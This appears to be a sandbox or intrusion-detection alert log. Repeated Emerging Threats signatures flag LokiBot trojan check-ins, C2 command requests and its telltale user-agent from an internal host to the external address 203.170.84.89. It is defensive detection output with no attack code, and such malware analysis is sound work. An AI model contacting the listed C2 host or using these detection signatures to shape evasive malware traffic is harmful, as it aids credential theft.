                                          02/22/21-19:13:09.379899TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.4203.170.84.89
                                          02/22/21-19:13:09.379899TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.4203.170.84.89
                                          02/22/21-19:13:10.753898TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.4203.170.84.89
                                          02/22/21-19:13:10.753898TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.4203.170.84.89
                                          02/22/21-19:13:10.753898TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.4203.170.84.89
                                          02/22/21-19:13:12.128792TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.4203.170.84.89
                                          02/22/21-19:13:12.128792TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.4203.170.84.89
                                          02/22/21-19:13:12.128792TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.4203.170.84.89
                                          02/22/21-19:13:13.445902TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.4203.170.84.89
                                          02/22/21-19:13:13.445902TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.4203.170.84.89
                                          02/22/21-19:13:13.445902TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.4203.170.84.89
                                          02/22/21-19:13:14.755155TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.4203.170.84.89
                                          02/22/21-19:13:14.755155TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.4203.170.84.89
                                          02/22/21-19:13:14.755155TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.4203.170.84.89
                                          02/22/21-19:13:16.098574TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.4203.170.84.89
                                          02/22/21-19:13:16.098574TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.4203.170.84.89
                                          02/22/21-19:13:16.098574TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.4203.170.84.89
                                          02/22/21-19:13:17.407438TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.4203.170.84.89
                                          02/22/21-19:13:17.407438TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.4203.170.84.89
                                          02/22/21-19:13:17.407438TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.4203.170.84.89
                                          02/22/21-19:13:18.738997TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.4203.170.84.89
                                          02/22/21-19:13:18.738997TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.4203.170.84.89
                                          02/22/21-19:13:18.738997TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.4203.170.84.89
                                          02/22/21-19:13:20.041935TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.4203.170.84.89
                                          02/22/21-19:13:20.041935TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.4203.170.84.89
                                          02/22/21-19:13:20.041935TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.4203.170.84.89
                                          02/22/21-19:13:21.333542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.4203.170.84.89
                                          02/22/21-19:13:21.333542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.4203.170.84.89
                                          02/22/21-19:13:21.333542TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.4203.170.84.89
                                          02/22/21-19:13:22.669300TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.4203.170.84.89
                                          02/22/21-19:13:22.669300TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.4203.170.84.89
                                          02/22/21-19:13:22.669300TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.4203.170.84.89
                                          02/22/21-19:13:24.013553TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.4203.170.84.89
                                          02/22/21-19:13:24.013553TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.4203.170.84.89
                                          02/22/21-19:13:24.013553TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.4203.170.84.89
                                          02/22/21-19:13:25.353621TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.4203.170.84.89
                                          02/22/21-19:13:25.353621TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.4203.170.84.89
                                          02/22/21-19:13:25.353621TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.4203.170.84.89
                                          02/22/21-19:13:26.968743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.4203.170.84.89
                                          02/22/21-19:13:26.968743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.4203.170.84.89
                                          02/22/21-19:13:26.968743TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.4203.170.84.89
                                          02/22/21-19:13:28.278128TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.4203.170.84.89
                                          02/22/21-19:13:28.278128TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.4203.170.84.89
                                          02/22/21-19:13:28.278128TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.4203.170.84.89
                                          02/22/21-19:13:29.579659TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.4203.170.84.89
                                          02/22/21-19:13:29.579659TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.4203.170.84.89
                                          02/22/21-19:13:29.579659TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.4203.170.84.89
                                          02/22/21-19:13:30.894738TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.4203.170.84.89
                                          02/22/21-19:13:30.894738TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.4203.170.84.89
                                          02/22/21-19:13:30.894738TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.4203.170.84.89
                                          02/22/21-19:13:32.184419TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.4203.170.84.89
                                          02/22/21-19:13:32.184419TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.4203.170.84.89
                                          02/22/21-19:13:32.184419TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.4203.170.84.89
                                          02/22/21-19:13:33.518152TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.4203.170.84.89
                                          02/22/21-19:13:33.518152TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.4203.170.84.89
                                          02/22/21-19:13:33.518152TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.4203.170.84.89
                                          02/22/21-19:13:34.813981TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.4203.170.84.89
                                          02/22/21-19:13:34.813981TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.4203.170.84.89
                                          02/22/21-19:13:34.813981TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.4203.170.84.89
                                          02/22/21-19:13:36.095387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.4203.170.84.89
                                          02/22/21-19:13:36.095387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.4203.170.84.89
                                          02/22/21-19:13:36.095387TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.4203.170.84.89
                                          02/22/21-19:13:37.374892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.4203.170.84.89
                                          02/22/21-19:13:37.374892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.4203.170.84.89
                                          02/22/21-19:13:37.374892TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.4203.170.84.89
                                          02/22/21-19:13:38.688701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.4203.170.84.89
                                          02/22/21-19:13:38.688701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.4203.170.84.89
                                          02/22/21-19:13:38.688701TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.4203.170.84.89
                                          02/22/21-19:13:39.984082TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.4203.170.84.89
                                          02/22/21-19:13:39.984082TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.4203.170.84.89
                                          02/22/21-19:13:39.984082TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.4203.170.84.89
                                          02/22/21-19:13:41.300879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.4203.170.84.89
                                          02/22/21-19:13:41.300879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.4203.170.84.89
                                          02/22/21-19:13:41.300879TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.4203.170.84.89
                                          02/22/21-19:13:42.586767TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.4203.170.84.89
                                          02/22/21-19:13:42.586767TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.4203.170.84.89
                                          02/22/21-19:13:42.586767TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.4203.170.84.89
                                          02/22/21-19:13:43.872010TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.4203.170.84.89
                                          02/22/21-19:13:43.872010TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.4203.170.84.89
                                          02/22/21-19:13:43.872010TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.4203.170.84.89
                                          02/22/21-19:13:45.134992TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.4203.170.84.89
                                          02/22/21-19:13:45.134992TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.4203.170.84.89
                                          02/22/21-19:13:45.134992TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.4203.170.84.89
                                          02/22/21-19:13:46.448703TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.4203.170.84.89
                                          02/22/21-19:13:46.448703TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.4203.170.84.89
                                          02/22/21-19:13:46.448703TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.4203.170.84.89
                                          02/22/21-19:13:47.761299TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.4203.170.84.89
                                          02/22/21-19:13:47.761299TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.4203.170.84.89
                                          02/22/21-19:13:47.761299TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.4203.170.84.89
                                          02/22/21-19:13:49.047258TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.4203.170.84.89
                                          02/22/21-19:13:49.047258TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.4203.170.84.89
                                          02/22/21-19:13:49.047258TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.4203.170.84.89
                                          02/22/21-19:13:50.324886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.4203.170.84.89
                                          02/22/21-19:13:50.324886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.4203.170.84.89
                                          02/22/21-19:13:50.324886TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.4203.170.84.89
                                          02/22/21-19:13:51.622676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.4203.170.84.89
                                          02/22/21-19:13:51.622676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.4203.170.84.89
                                          02/22/21-19:13:51.622676TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.4203.170.84.89
                                          02/22/21-19:13:52.940189TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.4203.170.84.89
                                          02/22/21-19:13:52.940189TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.4203.170.84.89
                                          02/22/21-19:13:52.940189TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.4203.170.84.89
                                          02/22/21-19:13:54.217316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.4203.170.84.89
                                          02/22/21-19:13:54.217316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.4203.170.84.89
                                          02/22/21-19:13:54.217316TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.4203.170.84.89
                                          02/22/21-19:13:55.493778TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.4203.170.84.89
                                          02/22/21-19:13:55.493778TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.4203.170.84.89
                                          02/22/21-19:13:55.493778TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.4203.170.84.89
                                          02/22/21-19:13:56.763032TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.4203.170.84.89
                                          02/22/21-19:13:56.763032TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.4203.170.84.89
                                          02/22/21-19:13:56.763032TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.4203.170.84.89
                                          02/22/21-19:13:58.050742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.4203.170.84.89
                                          02/22/21-19:13:58.050742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.4203.170.84.89
                                          02/22/21-19:13:58.050742TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.4203.170.84.89
                                          02/22/21-19:13:59.321820TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.4203.170.84.89
                                          02/22/21-19:13:59.321820TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.4203.170.84.89
                                          02/22/21-19:13:59.321820TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.4203.170.84.89
                                          02/22/21-19:14:00.631942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.4203.170.84.89
                                          02/22/21-19:14:00.631942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.4203.170.84.89
                                          02/22/21-19:14:00.631942TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.4203.170.84.89
                                          02/22/21-19:14:01.922836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.4203.170.84.89
                                          02/22/21-19:14:01.922836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.4203.170.84.89
                                          02/22/21-19:14:01.922836TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.4203.170.84.89
                                          02/22/21-19:14:03.230296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.4203.170.84.89
                                          02/22/21-19:14:03.230296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.4203.170.84.89
                                          02/22/21-19:14:03.230296TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.4203.170.84.89
                                          02/22/21-19:14:04.508068TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.4203.170.84.89
                                          02/22/21-19:14:04.508068TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.4203.170.84.89
                                          02/22/21-19:14:04.508068TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.4203.170.84.89
                                          02/22/21-19:14:05.814223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.4203.170.84.89
                                          02/22/21-19:14:05.814223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.4203.170.84.89
                                          02/22/21-19:14:05.814223TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.4203.170.84.89
                                          02/22/21-19:14:07.112781TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.4203.170.84.89
                                          02/22/21-19:14:07.112781TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.4203.170.84.89
                                          02/22/21-19:14:07.112781TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.4203.170.84.89
                                          02/22/21-19:14:08.413653TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.4203.170.84.89
                                          02/22/21-19:14:08.413653TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.4203.170.84.89
                                          02/22/21-19:14:08.413653TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.4203.170.84.89
                                          02/22/21-19:14:09.712194TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.4203.170.84.89
                                          02/22/21-19:14:09.712194TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.4203.170.84.89
                                          02/22/21-19:14:09.712194TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.4203.170.84.89
                                          02/22/21-19:14:11.002003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.4203.170.84.89
                                          02/22/21-19:14:11.002003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.4203.170.84.89
                                          02/22/21-19:14:11.002003TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.4203.170.84.89
                                          02/22/21-19:14:12.313270TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.4203.170.84.89
                                          02/22/21-19:14:12.313270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.4203.170.84.89
                                          02/22/21-19:14:12.313270TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.4203.170.84.89
                                          02/22/21-19:14:13.908883TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.4203.170.84.89
                                          02/22/21-19:14:13.908883TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.4203.170.84.89
                                          02/22/21-19:14:13.908883TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.4203.170.84.89
                                          02/22/21-19:14:15.437535TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.4203.170.84.89
                                          02/22/21-19:14:15.437535TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.4203.170.84.89
                                          02/22/21-19:14:15.437535TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.4203.170.84.89
                                          02/22/21-19:14:16.710648TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.4203.170.84.89
                                          02/22/21-19:14:16.710648TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.4203.170.84.89
                                          02/22/21-19:14:16.710648TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.4203.170.84.89
                                          02/22/21-19:14:18.024684TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.4203.170.84.89
                                          02/22/21-19:14:18.024684TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.4203.170.84.89
                                          02/22/21-19:14:18.024684TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.4203.170.84.89
                                          02/22/21-19:14:19.321868TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.4203.170.84.89
                                          02/22/21-19:14:19.321868TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.4203.170.84.89
                                          02/22/21-19:14:19.321868TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.4203.170.84.89
                                          02/22/21-19:14:20.599287TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.4203.170.84.89
                                          02/22/21-19:14:20.599287TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.4203.170.84.89
                                          02/22/21-19:14:20.599287TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.4203.170.84.89
                                          02/22/21-19:14:21.882521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.4203.170.84.89
                                          02/22/21-19:14:21.882521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.4203.170.84.89
                                          02/22/21-19:14:21.882521TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.4203.170.84.89
                                          02/22/21-19:14:23.176365TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.4203.170.84.89
                                          02/22/21-19:14:23.176365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.4203.170.84.89
                                          02/22/21-19:14:23.176365TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.4203.170.84.89
                                          02/22/21-19:14:24.482440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983180192.168.2.4203.170.84.89
                                          02/22/21-19:14:24.482440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983180192.168.2.4203.170.84.89
                                          02/22/21-19:14:24.482440TCP2025381ET TROJAN LokiBot Checkin4983180192.168.2.4203.170.84.89
                                          02/22/21-19:14:25.733888TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.4203.170.84.89
                                          02/22/21-19:14:25.733888TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.4203.170.84.89
                                          02/22/21-19:14:25.733888TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.4203.170.84.89
                                          02/22/21-19:14:27.016301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.4203.170.84.89
                                          02/22/21-19:14:27.016301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.4203.170.84.89
                                          02/22/21-19:14:27.016301TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.4203.170.84.89
                                          02/22/21-19:14:28.298521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.4203.170.84.89
                                          02/22/21-19:14:28.298521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.4203.170.84.89
                                          02/22/21-19:14:28.298521TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.4203.170.84.89
                                          02/22/21-19:14:29.542203TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.4203.170.84.89
                                          02/22/21-19:14:29.542203TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.4203.170.84.89
                                          02/22/21-19:14:29.542203TCP2025381ET TROJAN LokiBot Checkin4983580192.168.2.4203.170.84.89
                                          02/22/21-19:14:30.810538TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.4203.170.84.89
                                          02/22/21-19:14:30.810538TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.4203.170.84.89
                                          02/22/21-19:14:30.810538TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.4203.170.84.89
                                          02/22/21-19:14:32.137483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.4203.170.84.89
                                          02/22/21-19:14:32.137483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.4203.170.84.89
                                          02/22/21-19:14:32.137483TCP2025381ET TROJAN LokiBot Checkin4983980192.168.2.4203.170.84.89
                                          02/22/21-19:14:33.411950TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.4203.170.84.89
                                          02/22/21-19:14:33.411950TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.4203.170.84.89
                                          02/22/21-19:14:33.411950TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.4203.170.84.89
                                          02/22/21-19:14:34.725026TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.4203.170.84.89
                                          02/22/21-19:14:34.725026TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.4203.170.84.89
                                          02/22/21-19:14:34.725026TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.4203.170.84.89
                                          02/22/21-19:14:36.028479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.4203.170.84.89
                                          02/22/21-19:14:36.028479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.4203.170.84.89
                                          02/22/21-19:14:36.028479TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.4203.170.84.89
                                          02/22/21-19:14:37.334442TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.4203.170.84.89
                                          02/22/21-19:14:37.334442TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.4203.170.84.89
                                          02/22/21-19:14:37.334442TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.4203.170.84.89
                                          02/22/21-19:14:38.623262TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.4203.170.84.89
                                          02/22/21-19:14:38.623262TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.4203.170.84.89
                                          02/22/21-19:14:38.623262TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.4203.170.84.89
                                          02/22/21-19:14:39.953346TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.4203.170.84.89
                                          02/22/21-19:14:39.953346TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.4203.170.84.89
                                          02/22/21-19:14:39.953346TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.4203.170.84.89
                                          02/22/21-19:14:41.267887TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.4203.170.84.89
                                          02/22/21-19:14:41.267887TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.4203.170.84.89
                                          02/22/21-19:14:41.267887TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.4203.170.84.89
                                          02/22/21-19:14:42.561340TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.2.4203.170.84.89
                                          02/22/21-19:14:42.561340TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.2.4203.170.84.89
                                          02/22/21-19:14:42.561340TCP2025381ET TROJAN LokiBot Checkin4984780192.168.2.4203.170.84.89
                                          02/22/21-19:14:43.857917TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.4203.170.84.89
                                          02/22/21-19:14:43.857917TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.4203.170.84.89
                                          02/22/21-19:14:43.857917TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.4203.170.84.89
                                          02/22/21-19:14:45.133832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.2.4203.170.84.89
                                          02/22/21-19:14:45.133832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.2.4203.170.84.89
                                          02/22/21-19:14:45.133832TCP2025381ET TROJAN LokiBot Checkin4984980192.168.2.4203.170.84.89
                                          02/22/21-19:14:46.440406TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.4203.170.84.89
                                          02/22/21-19:14:46.440406TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.4203.170.84.89
                                          02/22/21-19:14:46.440406TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.4203.170.84.89
                                          02/22/21-19:14:47.730697TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.4203.170.84.89
                                          02/22/21-19:14:47.730697TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.4203.170.84.89
                                          02/22/21-19:14:47.730697TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.4203.170.84.89
                                          02/22/21-19:14:49.051550TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.4203.170.84.89
                                          02/22/21-19:14:49.051550TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.4203.170.84.89
                                          02/22/21-19:14:49.051550TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.4203.170.84.89
                                          02/22/21-19:14:50.340811TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.4203.170.84.89
                                          02/22/21-19:14:50.340811TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.4203.170.84.89
                                          02/22/21-19:14:50.340811TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.4203.170.84.89
                                          02/22/21-19:14:51.621970TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.4203.170.84.89
                                          02/22/21-19:14:51.621970TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.4203.170.84.89
